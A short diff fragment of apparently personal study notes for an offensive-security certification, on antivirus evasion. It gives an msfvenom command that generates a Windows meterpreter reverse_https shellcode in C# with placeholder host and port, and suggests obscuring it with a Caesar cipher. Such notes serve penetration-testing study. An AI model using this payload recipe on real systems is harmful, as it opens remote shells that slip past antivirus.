satanicang3l/osepnotes/docs/antivirus/methods.md

 1. Generate a C# shellcode:
 `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=PORT EXITFUNC=thread -f csharp`

-2. Refer to the [original C# Shellcode](#original-shellcode), or can also combine it with the Caesar cipher.
+2. Refer to the [original C# Shellcode](#original-shellcode), and can also combine it with the Caesar cipher.

 3. Insert the following code: